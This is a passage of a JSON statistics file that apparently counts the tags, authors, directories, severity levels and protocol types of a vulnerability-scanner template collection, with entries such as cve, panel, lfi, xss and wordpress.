intelliflash","count":1},{"name":"rmc","count":1},{"name":"nutanix","count":1},{"name":"jwt","count":1},{"name":"cse","count":1},{"name":"myucms","count":1},{"name":"kingdee","count":1},{"name":"flexbe","count":1},{"name":"secmail","count":1},{"name":"sauter","count":1},{"name":"tor","count":1},{"name":"formcraft3","count":1},{"name":"oliver","count":1},{"name":"viewlinc","count":1},{"name":"sceditor","count":1},{"name":"oauth2","count":1},{"name":"workresources","count":1},{"name":"tieline","count":1},{"name":"xdcms","count":1},{"name":"covalent","count":1},{"name":"microcomputers","count":1},{"name":"activeadmin","count":1},{"name":"kvm","count":1},{"name":"simplecrm","count":1},{"name":"noptin","count":1},{"name":"jabber","count":1},{"name":"expn","count":1},{"name":"checkmarx","count":1},{"name":"vision","count":1},{"name":"plc","count":1},{"name":"huemagic","count":1},{"name":"olivetti","count":1},{"name":"instagram","count":1},{"name":"icinga","count":1},{"name":"taiga","count":1},{"name":"mozilla","count":1},{"name":"graylog","count":1},{"name":"clave","count":1},{"name":"perl","count":1},{"name":"rmi","count":1},{"name":"yopass","count":1},{"name":"sage","count":1},{"name":"spip","count":1},{"name":"triconsole","count":1},{"name":"nifi","count":1},{"name":"txt","count":1},{"name":"starttls","count":1},{"name":"cname","count":1},{"name":"directadmin","count":1},{"name":"extractor","count":1},{"name":"varnish","count":1},{"name":"biqsdrive","count":1},{"name":"casemanager","count":1},{"name":"pastebin","count":1},{"name":"iconfinder","count":1},{"name":"paneil","count":1},{"name":"haproxy","count":1},{"name":"cve2002","count":1},{"name":"improvmx","count":1},{"name":"realteo","count":1},{"name":"octobercms","count":1},{"name":"bitquery","count":1},{"name":"adafruit","count":1},{"name":"prototype","count":1},{"name":"pollbot","count":1},{"name":"accent","count":1},{"name":"mariadb","count":1},{"name":"bhagavadgita","count":1},{"name":"knowage","count":1},{"name":"kyocera","count":1},{"name":"mongo-express","count":1},{"name":"plone","count":1},{"name":"socomec","count":1},{"name":"wmt","count":1},{"name":"dvdFab","count":1},{"name":"acemanager","count":1},{"name":"ruoyi","count":1},{"name":"ninjaform","count":1},{"name":"restler","count":1},{"name":"markdown","count":1},{"name":"timeclock","count":1},{"name":"zmanda","count":1},{"name":"hiawatha","count":1},{"name":"holidayapi","count":1},{"name":"aniapi","count":1},{"name":"appveyor","count":1},{"name":"place","count":1},{"name":"snipeit","count":1},{"name":"sast","count":1},{"name":"semaphore","count":1},{"name":"mediumish","count":1},{"name":"caa","count":1},{"name":"rainloop","count":1},{"name":"elevation","count":1},{"name":"totaljs","count":1},{"name":"tarantella","count":1},{"name":"shiro","count":1},{"name":"spiderfoot","count":1},{"name":"gstorage","count":1},{"name":"kramer","count":1},{"name":"oam","count":1},{"name":"etouch","count":1},{"name":"hrsale","count":1},{"name":"finereport","count":1},{"name":"st","count":1},{"name":"struts2","count":1},{"name":"spidercontrol","count":1},{"name":"xds","count":1},{"name":"tjws","count":1},{"name":"directum","count":1},{"name":"portal","count":1},{"name":"shopware","count":1},{"name":"zend","count":1},{"name":"telecom","count":1},{"name":"aura","count":1},{"name":"h5s","count":1},{"name":"cron","count":1},{"name":"pan","count":1},{"name":"scimono","count":1},{"name":"optimizely","count":1},{"name":"opengear","count":1},{"name":"ncomputing","count":1},{"name":"apcu","count":1},{"name":"delta","count":1},{"name":"slocum","count":1},{"name":"zuul","count":1},{"name":"securityspy","count":1},{"name":"sunflower","count":1},{"name":"pyramid","count":1},{"name":"admin","count":1},{"name":"open-redirect","count":1},{"name":"fontawesome","count":1},{"name":"smartsheet","count":1},{"name":"server","count":1},{"name":"avatier","count":1},{"name":"cofax","count":1},{"name":"newsletter","count":1},{"name":"threatq","count":1},{"name":"geolocation","count":1},{"name":"landray","count":1},{"name":"buttercms","count":1},{"name":"nps","count":1},{"name":"eyoumail","count":1},{"name":"fastapi","count":1},{"name":"commvault","count":1},{"name":"bazarr","count":1},{"name":"xmlchart","count":1},{"name":"comodo","count":1},{"name":"esxi","count":1},{"name":"moinmoin","count":1},{"name":"jeecg-boot","count":1},{"name":"bitrise","count":1},{"name":"bedita","count":1},{"name":"books","count":1},{"name":"jaspersoft","count":1},{"name":"prestahome","count":1},{"name":"workspace","count":1},{"name":"opentsdb","count":1},{"name":"eyesofnetwork","count":1},{"name":"kodexplorer","count":1},{"name":"centreon","count":1},{"name":"ewebs","count":1},{"name":"iserver","count":1},{"name":"iframe","count":1},{"name":"pyspider","count":1},{"name":"doh","count":1},{"name":"goanywhere","count":1},{"name":"calendly","count":1},{"name":"openerp","count":1},{"name":"web-dispatcher","count":1},{"name":"nimble","count":1},{"name":"fortigates","count":1},{"name":"h5sconsole","count":1},{"name":"postgres","count":1},{"name":"opensmtpd","count":1},{"name":"mailboxvalidator","count":1},{"name":"flowci","count":1},{"name":"commscope","count":1},{"name":"zeppelin","count":1},{"name":"billquick","count":1},{"name":"cerebro","count":1},{"name":"clockwatch","count":1},{"name":"yongyou","count":1},{"name":"b2bbuilder","count":1},{"name":"iucn","count":1},{"name":"vscode","count":1},{"name":"wiki","count":1},{"name":"musicstore","count":1},{"name":"opensearch","count":1},{"name":"ecshop","count":1},{"name":"coinranking","count":1},{"name":"adb","count":1},{"name":"vms","count":1},{"name":"cscart","count":1},{"name":"servicedesk","count":1},{"name":"travis","count":1},{"name":"ymhome","count":1},{"name":"feedwordpress","count":1},{"name":"abuseipdb","count":1},{"name":"springframework","count":1},{"name":"blueiris","count":1},{"name":"erp-nc","count":1},{"name":"labtech","count":1},{"name":"franklinfueling","count":1},{"name":"geutebruck","count":1},{"name":"huijietong","count":1},{"name":"idera","count":1},{"name":"spotify","count":1},{"name":"epm","count":1},{"name":"coinlayer","count":1},{"name":"supervisor","count":1},{"name":"dicoogle","count":1},{"name":"vanguard","count":1},{"name":"speed","count":1},{"name":"vsftpd","count":1},{"name":"darkstat","count":1},{"name":"oki","count":1},{"name":"nomad","count":1},{"name":"fastcgi","count":1},{"name":"tamronos","count":1},{"name":"phpunit","count":1},{"name":"limit","count":1},{"name":"default","count":1},{"name":"rdp","count":1},{"name":"wakatime","count":1},{"name":"mara","count":1},{"name":"mod-proxy","count":1},{"name":"interlib","count":1},{"name":"cve2001","count":1},{"name":"instatus","count":1},{"name":"portainer","count":1},{"name":"seopanel","count":1},{"name":"lionwiki","count":1},{"name":"whmcs","count":1},{"name":"xunchi","count":1},{"name":"sprintful","count":1},{"name":"bingmaps","count":1},{"name":"expressjs","count":1},{"name":"processmaker","count":1},{"name":"sponip","count":1},{"name":"phalcon","count":1},{"name":"kodi","count":1},{"name":"viaware","count":1},{"name":"kerbynet","count":1},{"name":"tinymce","count":1},{"name":"xproxy","count":1},{"name":"console","count":1},{"name":"kronos","count":1},{"name":"ilo4","count":1},{"name":"hiboss","count":1},{"name":"biostar2","count":1},{"name":"dnssec","count":1},{"name":"dasan","count":1},{"name":"osquery","count":1},{"name":"prismaweb","count":1},{"name":"sterling","count":1},{"name":"phpwiki","count":1},{"name":"xiuno","count":1},{"name":"issabel","count":1},{"name":"quantum","count":1},{"name":"salesforce","count":1},{"name":"eibiz","count":1},{"name":"shortcode","count":1},{"name":"mrtg","count":1},{"name":"mapbox","count":1},{"name":"memory-pipes","count":1},{"name":"websvn","count":1},{"name":"smuggling","count":1},{"name":"eyou","count":1},{"name":"zookeeper","count":1},{"name":"ganglia","count":1},{"name":"harvardart","count":1},{"name":"dahua","count":1},{"name":"opm","count":1},{"name":"luftguitar","count":1},{"name":"softaculous","count":1},{"name":"clustering","count":1},{"name":"crestron","count":1},{"name":"etherscan","count":1},{"name":"adoptapet","count":1},{"name":"okta","count":1},{"name":"idemia","count":1},{"name":"cors","count":1},{"name":"mappress","count":1},{"name":"onkyo","count":1},{"name":"k8","count":1},{"name":"csod","count":1},{"name":"charity","count":1},{"name":"weglot","count":1},{"name":"radius","count":1},{"name":"edgemax","count":1},{"name":"ueditor","count":1},{"name":"opencast","count":1},{"name":"cve2004","count":1},{"name":"ssi","count":1},{"name":"suprema","count":1},{"name":"robomongo","count":1},{"name":"adfs","count":1},{"name":"yealink","count":1},{"name":"tekon","count":1},{"name":"joget","count":1},{"name":"alltube","count":1},{"name":"avalanche","count":1},{"name":"secret","count":1},{"name":"tracer","count":1},{"name":"neo4j","count":1},{"name":"javafaces","count":1},{"name":"solman","count":1},{"name":"particle","count":1},{"name":"mtheme","count":1},{"name":"gunicorn","count":1},{"name":"bullwark","count":1},{"name":"myanimelist","count":1},{"name":"zzzphp","count":1},{"name":"sco","count":1},{"name":"ncbi","count":1},{"name":"pagerduty","count":1},{"name":"wordcloud","count":1},{"name":"froxlor","count":1},{"name":"directions","count":1},{"name":"sourcebans","count":1},{"name":"scanii","count":1},{"name":"zenario","count":1},{"name":"urlscan","count":1},{"name":"wondercms","count":1},{"name":"expose","count":1},{"name":"calendarix","count":1},{"name":"axiom","count":1},{"name":"hortonworks","count":1},{"name":"abstractapi","count":1},{"name":"stem","count":1},{"name":"dericam","count":1},{"name":"werkzeug","count":1},{"name":"achecker","count":1},{"name":"containers","count":1},{"name":"webmodule-ee","count":1},{"name":"email","count":1},{"name":"emby","count":1},{"name":"oscommerce","count":1},{"name":"pihole","count":1},{"name":"kyan","count":1},{"name":"roundcube","count":1},{"name":"dixell","count":1},{"name":"rsa","count":1},{"name":"zoomsounds","count":1},{"name":"jenzabar","count":1},{"name":"h3c-imc","count":1},{"name":"webui","count":1},{"name":"ipstack","count":1},{"name":"fiori","count":1},{"name":"jreport","count":1},{"name":"nc2","count":1},{"name":"opnsense","count":1},{"name":"clockwork","count":1},{"name":"identityguard","count":1},{"name":"lenovo","count":1},{"name":"nearby","count":1},{"name":"wavlink","count":1},{"name":"nette","count":1},{"name":"rudloff","count":1},{"name":"apigee","count":1},{"name":"loganalyzer","count":1},{"name":"blockfrost","count":1},{"name":"shoretel","count":1},{"name":"barco","count":1},{"name":"addpac","count":1},{"name":"mojoauth","count":1},{"name":"meshcentral","count":1},{"name":"pieregister","count":1},{"name":"secnet","count":1},{"name":"allied","count":1},{"name":"gemweb","count":1},{"name":"tuxedo","count":1},{"name":"openx","count":1},{"name":"mongoshake","count":1},{"name":"dom","count":1},{"name":"groupoffice","count":1},{"name":"monitorix","count":1},{"name":"buildkite","count":1},{"name":"scalar","count":1},{"name":"catfishcms","count":1},{"name":"accuweather","count":1},{"name":"wing-ftp","count":1},{"name":"parentlink","count":1},{"name":"tianqing","count":1}],"authors":[{"name":"daffainfo","count":560},{"name":"dhiyaneshdk","count":421},{"name":"pikpikcu","count":316},{"name":"pdteam","count":262},{"name":"geeknik","count":178},{"name":"dwisiswant0","count":168},{"name":"princechaddha","count":130},{"name":"0x_akoko","count":129},{"name":"gy741","count":117},{"name":"pussycat0x","count":116},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":46},{"name":"gaurang","count":42},{"name":"ritikchaddha","count":37},{"name":"philippedelteil","count":36},{"name":"adam crosser","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":23},{"name":"ffffffff0x","count":22},{"name":"righettod","count":18},{"name":"cckuailong","count":17},{"name":"akincibor","count":16},{"name":"for3stco1d","count":15},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"r3dg33k","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":14},{"name":"sharath","count":13},{"name":"suman_kar","count":12},{"name":"sullo","count":12},{"name":"wdahlenb","count":11},{"name":"melbadry9","count":11},{"name":"cyllective","count":11},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"meme-lord","count":10},{"name":"johnk3r","count":10},{"name":"random_robbie","count":10},{"name":"alph4byt3","count":10},{"name":"dogasantos","count":9},{"name":"emadshanab","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"edoardottt","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"logicalhunter","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"random-robbie","count":7},{"name":"randomstr1ng","count":7},{"name":"divya_mudgal","count":7},{"name":"rootxharsh","count":6},{"name":"puzzlepeaches","count":6},{"name":"leovalcante","count":6},{"name":"iamnoooob","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"pathtaga","count":6},{"name":"evan rubinstein","count":6},{"name":"pentest_swissky","count":6},{"name":"forgedhallpass","count":6},{"name":"panch0r3d","count":5},{"name":"podalirius","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"imnightmaree","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"_0xf4n9x_","count":5},{"name":"defr0ggy","count":4},{"name":"dadevel","count":4},{"name":"nodauf","count":4},{"name":"tanq16","count":4},{"name":"dolev farhi","count":4},{"name":"e_schultze_","count":4},{"name":"tess","count":4},{"name":"wisnupramoedya","count":4},{"name":"incogbyte","count":4},{"name":"supras","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"whoever","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"impramodsargar","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"andydoering","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"davidmckennirey","count":3},{"name":"f1tz","count":3},{"name":"h1ei1","count":3},{"name":"arcc","count":3},{"name":"z3bd","count":3},{"name":"skeltavik","count":3},{"name":"sushantkamble","count":3},{"name":"github.com/its0x08","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"johnjhacking","count":3},{"name":"alifathi-h1","count":3},{"name":"mr-xn","count":3},{"name":"gitlab red team","count":3},{"name":"emenalf","count":3},{"name":"shine","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"lark-lab","count":3},{"name":"r3naissance","count":3},{"name":"me9187","count":3},{"name":"g4l1t0","count":2},{"name":"kiblyn11","count":2},{"name":"k11h-de","count":2},{"name":"splint3r7","count":2},{"name":"nvn1729","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"r12w4n","count":2},{"name":"mohammedsaneem","count":2},{"name":"ehsahil","count":2},{"name":"kre80r","count":2},{"name":"bananabr","count":2},{"name":"dahse89","count":2},{"name":"manas_harsh","count":2},{"name":"bing0o","count":2},{"name":"koti2","count":2},{"name":"raesene","count":2},{"name":"its0x08","count":2},{"name":"luci","count":2},{"name":"hackerarpan","count":2},{"name":"hahwul","count":2},{"name":"vavkamil","count":2},{"name":"martincodes-de","count":2},{"name":"0xsmiley","count":2},{"name":"nuk3s3c","count":2},{"name":"foulenzer","count":2},{"name":"rafaelwdornelas","count":2},{"name":"0xcrypto","count":2},{"name":"bsysop","count":2},{"name":"parth","count":2},{"name":"socketz","count":2},{"name":"0xrudra","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"vsh00t","count":2},{"name":"y4er","count":2},{"name":"fabaff","count":2},{"name":"thardt-praetorian","count":2},{"name":"ajaysenr","count":2},{"name":"0xprial","count":2},{"name":"convisoappsec","count":2},{"name":"bp0lr","count":2},{"name":"geekby","count":2},{"name":"gal nagli","count":2},{"name":"gevakun","count":2},{"name":"cocxanh","count":2},{"name":"paradessia","count":2},{"name":"udit_thakkur","count":2},{"name":"cckuakilong","count":2},{"name":"bernardofsr","count":2},{"name":"hetroublemakr","count":2},{"name":"zomsop82","count":2},{"name":"amsda","count":2},{"name":"z0ne","count":2},{"name":"afaq","count":2},{"name":"ambassify","count":2},{"name":"x1m_martijn","count":2},{"name":"sbani","count":2},{"name":"hassan khan yusufzai - splint3r7","count":2},{"name":"0xelkomy","count":2},{"name":"paperpen","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"taielab","count":2},{"name":"joeldeleep","count":2},{"name":"danielmofer","count":2},{"name":"pxmme1337","count":2},{"name":"dheerajmadhukar","count":2},{"name":"lotusdll","count":2},{"name":"sy3omda","count":2},{"name":"w4cky_","count":2},{"name":"redteambrasil","count":2},{"name":"huowuzhao","count":2},{"name":"swissky","count":2},{"name":"nkxxkn","count":2},{"name":"moritz nentwig","count":2},{"name":"randomrobbie","count":2},{"name":"smaranchand","count":2},{"name":"aresx","count":1},{"name":"justmumu","count":1},{"name":"zandros0","count":1},{"name":"0xtavian","count":1},{"name":"ahmetpergamum","count":1},{"name":"hexcat","count":1},{"name":"berkdusunur","count":1},{"name":"jeya.seelan","count":1},{"name":"exceed","count":1},{"name":"amnotacat","count":1},{"name":"mhdsamx","count":1},{"name":"bughuntersurya","count":1},{"name":"yashgoti","count":1},{"name":"sherlocksecurity","count":1},{"name":"jas37","count":1},{"name":"absshax","count":1},{"name":"phyr3wall","count":1},{"name":"_harleo","count":1},{"name":"push4d","count":1},{"name":"brenocss","count":1},{"name":"thesubtlety","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"lethargynavigator","count":1},{"name":"hanlaomo","count":1},{"name":"ringo","count":1},{"name":"orpheus","count":1},{"name":"clarkvoss","count":1},{"name":"akshansh","count":1},{"name":"tim_koopmans","count":1},{"name":"charanrayudu","count":1},{"name":"regala_","count":1},{"name":"shifacyclewla","count":1},{"name":"ofjaaah","count":1},{"name":"s1r1u5_","count":1},{"name":"rschio","count":1},{"name":"husain","count":1},{"name":"3th1c_yuk1","count":1},{"name":"andirrahmani1","count":1},{"name":"thebinitghimire","count":1},{"name":"affix","count":1},{"name":"jrolf","count":1},{"name":"jeya seelan","count":1},{"name":"coldfish","count":1},{"name":"xstp","count":1},{"name":"0xteles","count":1},{"name":"v0idc0de","count":1},{"name":"intx0x80","count":1},{"name":"kabirsuda","count":1},{"name":"ahmed sherif","count":1},{"name":"0xceeb","count":1},{"name":"0xh7ml","count":1},{"name":"yuansec","count":1},{"name":"toufik-airane","count":1},{"name":"daffianfo","count":1},{"name":"yashanand155","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"rojanrijal","count":1},{"name":"ohlinge","count":1},{"name":"prettyboyaaditya","count":1},{"name":"mubassirpatel","count":1},{"name":"wlayzz","count":1},{"name":"nerrorsec","count":1},{"name":"pudsec","count":1},{"name":"xshuden","count":1},{"name":"philippdelteil","count":1},{"name":"sshell","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"arr0way","count":1},{"name":"myztique","count":1},{"name":"knassar702","count":1},{"name":"willd96","count":1},{"name":"dawid-czarnecki","count":1},{"name":"tea","count":1},{"name":"evan rubinstien","count":1},{"name":"0ut0fb4nd","count":1},{"name":"rotemreiss","count":1},{"name":"compr00t","count":1},{"name":"wabafet","count":1},{"name":"co0nan","count":1},{"name":"revblock","count":1},{"name":"ggranjus","count":1},{"name":"akash.c","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"harshinsecurity","count":1},{"name":"official_blackhat13","count":1},{"name":"fmunozs","count":1},{"name":"luskabol","count":1},{"name":"evolutionsec","count":1},{"name":"juicypotato1","count":1},{"name":"xeldax","count":1},{"name":"kailashbohara","count":1},{"name":"mass0ma","count":1},{"name":"mah3sec_","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dievus","count":1},{"name":"duty_1g","count":1},{"name":"udyz","count":1},{"name":"alperenkesk","count":1},{"name":"ahmed abou-ela","count":1},{"name":"hakluke","count":1},{"name":"florianmaak","count":1},{"name":"b0yd","count":1},{"name":"sickwell","count":1},{"name":"patralos","count":1},{"name":"apt-mirror","count":1},{"name":"bartu utku sarp","count":1},{"name":"nytr0gen","count":1},{"name":"noamrathaus","count":1},{"name":"act1on3","count":1},{"name":"alex","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"makyotox","count":1},{"name":"elmahdi","count":1},{"name":"d4vy","count":1},{"name":"th3.d1p4k","count":1},{"name":"p-l-","count":1},{"name":"cookiehanhoan","count":1},{"name":"momen eldawakhly","count":1},{"name":"f1she3","count":1},{"name":"alevsk","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"andysvints","count":1},{"name":"droberson","count":1},{"name":"ldionmarcil","count":1},{"name":"micha3lb3n","count":1},{"name":"retr0","count":1},{"name":"x6263","count":1},{"name":"soyelmago","count":1},{"name":"jteles","count":1},{"name":"ok_bye_now","count":1},{"name":"qlkwej","count":1},{"name":"skylark-lab","count":1},{"name":"igibanez","count":1},{"name":"shreyapohekar","count":1},{"name":"streetofhackerr007","count":1},{"name":"thevillagehacker","count":1},{"name":"izn0u","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"nielsing","count":1},{"name":"breno_css","count":1},{"name":"chron0x","count":1},{"name":"notsoevilweasel","count":1},{"name":"zhenwarx","count":1},{"name":"blckraven","count":1},{"name":"anon-artist","count":1},{"name":"infosecsanyam","count":1},{"name":"0xrod","count":1},{"name":"retr02332","count":1},{"name":"kiks7","count":1},{"name":"osamahamad","count":1},{"name":"thezakman","count":1},{"name":"luqmaan hadia","count":1},{"name":"zinminphy0","count":1},{"name":"manuelbua","count":1},{"name":"majidmc2","count":1},{"name":"becivells","count":1},{"name":"furkansayim","count":1},{"name":"ipanda","count":1},{"name":"tirtha_mandal","count":1},{"name":"miroslavsotak","count":1},{"name":"clment cruchet","count":1},{"name":"exploitation","count":1},{"name":"lark lab","count":1},{"name":"mesaglio","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"iampritam","count":1},{"name":"exid","count":1},{"name":"petruknisme","count":1},{"name":"tirtha","count":1},{"name":"yavolo","count":1},{"name":"shelld3v","count":1},{"name":"b0rn2r00t","count":1},{"name":"j33n1k4","count":1},{"name":"sec_hawk","count":1},{"name":"0h1in9e","count":1},{"name":"0xd0ff9","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"geraldino2","count":1},{"name":"bad5ect0r","count":1},{"name":"deena","count":1},{"name":"rodnt","count":1},{"name":"manasmbellani","count":1},{"name":"zsusac","count":1},{"name":"aaronchen0","count":1},{"name":"fq_hsu","count":1},{"name":"remonsec","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"adrianmf","count":1},{"name":"un-fmunozs","count":1},{"name":"kareemse1im","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"furkansenan","count":1},{"name":"0xceba","count":1},{"name":"schniggie","count":1},{"name":"kurohost","count":1},{"name":"ilovebinbash","count":1},{"name":"borna nematzadeh","count":1},{"name":"elouhi","count":1},{"name":"ooooooo_q","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"omarkurt","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"arall","count":1},{"name":"gboddin","count":1},{"name":"kaizensecurity","count":1},{"name":"daviey","count":1},{"name":"mrcl0wnlab","count":1},{"name":"notnotnotveg","count":1},{"name":"flag007","count":1},{"name":"narluin","count":1},{"name":"b4uh0lz","count":1},{"name":"oscarintherocks","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"c3l3si4n","count":1},{"name":"noobexploiter","count":1},{"name":"francescocarlucci","count":1},{"name":"2rs3c","count":1},{"name":"_darrenmartyn","count":1},{"name":"luqman","count":1},{"name":"undefl0w","count":1},{"name":"veshraj","count":1},{"name":"brabbit10","count":1},{"name":"d0rkerdevil","count":1},{"name":"pratik khalane","count":1},{"name":"vzamanillo","count":1},{"name":"elder tao","count":1},{"name":"sicksec","count":1},{"name":"opencirt","count":1},{"name":"whynotke","count":1},{"name":"bjhulst","count":1},{"name":"_c0wb0y_","count":1},{"name":"jiheon-dev","count":1},{"name":"pdp","count":1},{"name":"dhiyaneshdki","count":1},{"name":"rubina119","count":1},{"name":"alexrydzak","count":1},{"name":"jbaines-r7","count":1}],"directory":[{"name":"cves","count":1154},{"name":"exposed-panels","count":519},{"name":"vulnerabilities","count":446},{"name":"technologies","count":251},{"name":"exposures","count":203},{"name":"misconfiguration","count":196},{"name":"workflows","count":186},{"name":"token-spray","count":153},{"name":"default-logins","count":95},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1183},{"name":"high","count":870},{"name":"medium","count":658},{"name":"critical","count":411},{"name":"low","count":180},{"name":"unknown","count":6}],"types":[{"name":"http","count":3164},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1156},{"name":"panel","count":515},{"name":"lfi","count":461},{"name":"xss","count":367},{"name":"wordpress","count":364},{"name":"exposure","count":293},{"name":"rce","count":291},{"name":"cve2021","count":283},{"name":"tech","count":271},{"name":"wp-plugin","count":264},{"name":"cve2020","count":197},{"name":"","count":188},{"name":"token-spray","count":154},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"cve2018","count":121},{"name":"apache","count":120},{"name":"cve2019","count":118},{"name":"cve2010","count":111},{"name":"default-login","count":110},{"name":"unauth","count":108},{"name":"iot","count":102},{"name":"oast","count":97},{"name":"login","count":85},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":71},{"name":"misconfig","count":65},{"name":"cve2017","count":64},{"name":"cve2022","count":63},{"name":"sqli","count":62},{"name":"ssrf","count":61},{"name":"file","count":60},{"name":"wp","count":55},{"name":"network","count":53},{"name":"router","count":52},{"name":"oracle","count":50},{"name":"cve2016","count":45},{"name":"disclosure","count":45},{"name":"plugin","count":40},{"name":"auth-bypass","count":39},{"name":"cve2014","count":37},{"name":"google","count":36},{"name":"cve2015","count":36},{"name":"cisco","count":35},{"name":"authenticated","count":35},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"listing","count":30},{"name":"jira","count":30},{"name":"injection","count":30},{"name":"traversal","count":29},{"name":"devops","count":28},{"name":"generic","count":26},{"name":"kubernetes","count":25},{"name":"adobe","count":24},{"name":"cms","count":24},{"name":"springboot","count":24},{"name":"oss","count":24},{"name":"sap","count":22},{"name":"cnvd","count":22},{"name":"proxy","count":22},{"name":"microsoft","count":21},{"name":"debug","count":21},{"name":"intrusive","count":21},{"name":"misc","count":21},{"name":"vmware","count":21},{"name":"aem","count":21},{"name":"wp-theme","count":20},{"name":"service","count":20},{"name":"fuzz","count":20},{"name":"manageengine","count":19},{"name":"cve2012","count":19},{"name":"dns","count":18},{"name":"zoho","count":18},{"name":"php","count":18},{"name":"tomcat","count":17},{"name":"aws","count":17},{"name":"deserialization","count":17},{"name":"weblogic","count":17},{"name":"struts","count":16},{"name":"ibm","count":16},{"name":"k8s","count":16},{"name":"cve2011","count":15},{"name":"dlink","count":15},{"name":"jenkins","count":15},{"name":"gitlab","count":15},{"name":"api","count":14},{"name":"java","count":14},{"name":"android","count":14},{"name":"cve2009","count":14},{"name":"fileupload","count":14},{"name":"hp","count":14},{"name":"xxe","count":14},{"name":"firewall","count":13},{"name":"camera","count":13},{"name":"ruijie","count":13},{"name":"status","count":12},{"name":"nginx","count":12},{"name":"rails","count":12},{"name":"printer","count":12},{"name":"netsweeper","count":12},{"name":"log4j","count":12},{"name":"cve2013","count":12},{"name":"lfr","count":12},{"name":"magento","count":11},{"name":"upload","count":11},{"name":"cnvd2021","count":11},{"name":"netgear","count":11},{"name":"graphql","count":11},{"name":"grafana","count":10},{"name":"coldfusion","count":10},{"name":"glpi","count":10},{"name":"fortigate","count":10},{"name":"dell","count":10},{"name":"backup","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"auth","count":10},{"name":"airflow","count":10},{"name":"woocommerce","count":9},{"name":"fastjson","count":9},{"name":"iis","count":9},{"name":"fortinet","count":9},{"name":"drupal","count":9},{"name":"zabbix","count":9},{"name":"mirai","count":9},{"name":"cve2008","count":9},{"name":"jndi","count":9},{"name":"ftp","count":9},{"name":"github","count":9},{"name":"windows","count":9},{"name":"webserver","count":9},{"name":"laravel","count":9},{"name":"wso2","count":9},{"name":"bypass","count":8},{"name":"audit","count":8},{"name":"metadata","count":8},{"name":"phpmyadmin","count":8},{"name":"vcenter","count":8},{"name":"confluence","count":8},{"name":"solr","count":8},{"name":"zyxel","count":8},{"name":"amazon","count":8},{"name":"citrix","count":8},{"name":"prometheus","count":8},{"name":"blind","count":8},{"name":"django","count":8},{"name":"azure","count":8},{"name":"scada","count":8},{"name":"firebase","count":7},{"name":"maps","count":7},{"name":"squirrelmail","count":7},{"name":"python","count":7},{"name":"rconfig","count":7},{"name":"elasticsearch","count":7},{"name":"kube","count":7},{"name":"sonicwall","count":7},{"name":"ssti","count":7},{"name":"mail","count":7},{"name":"exchange","count":7},{"name":"kafka","count":7},{"name":"files","count":7},{"name":"vpn","count":7},{"name":"bucket","count":7},{"name":"docker","count":6},{"name":"cobbler","count":6},{"name":"sitecore","count":6},{"name":"jetty","count":6},{"name":"fpd","count":6},{"name":"nodejs","count":6},{"name":"ofbiz","count":6},{"name":"druid","count":6},{"name":"dedecms","count":6},{"name":"crlf","count":6},{"name":"backdoor","count":6},{"name":"magmi","count":6},{"name":"jboss","count":6},{"name":"slack","count":6},{"name":"enum","count":6},{"name":"huawei","count":6},{"name":"headless","count":6},{"name":"zimbra","count":6},{"name":"lucee","count":6},{"name":"firmware","count":6},{"name":"bigip","count":6},{"name":"cicd","count":6},{"name":"go","count":6},{"name":"ecology","count":6},{"name":"cnvd2020","count":6},{"name":"setup","count":5},{"name":"cache","count":5},{"name":